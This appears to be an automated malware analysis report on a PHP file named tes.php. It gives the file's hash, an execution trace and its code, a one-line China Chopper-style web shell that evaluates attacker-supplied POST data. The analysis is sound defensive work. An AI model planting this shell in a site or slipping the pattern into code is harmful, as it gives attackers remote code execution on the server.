PHP Malware Analysis

tes.php

md5: 385f37b79867ae78f55e40728c44309d

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

@eval($_POST['chopper']);

Execution traces

data/traces/385f37b79867ae78f55e40728c44309d_trace-1676261632.7829.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:14:18.680760]
1	0	1	0.000208	393512
1	3	0	0.000269	393864	{main}	1		/var/www/html/uploads/tes.php	0	0
1	3	1	0.000297	393896
			0.000331	314256
TRACE END   [2023-02-13 02:14:18.680923]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
@eval($_POST['chopper']);
?>